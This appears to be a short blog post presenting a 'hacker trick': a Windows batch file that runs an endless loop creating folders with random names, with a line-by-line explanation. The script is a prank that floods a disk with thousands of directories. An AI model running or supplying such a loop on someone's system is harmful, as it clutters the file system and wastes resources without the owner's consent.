Hacker is bAcK **tRick TiMe** How to create more than 3,000 folders under a minute. 1) Open your notepad and type the following code. @echo off :top md %random% goto top 2) Save it as file.bat @echo off makes your screen appear blank but it is actually making hundreds of folders. md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command to :top, causes an infinite loop.. ENJOY
No comments:
Post a Comment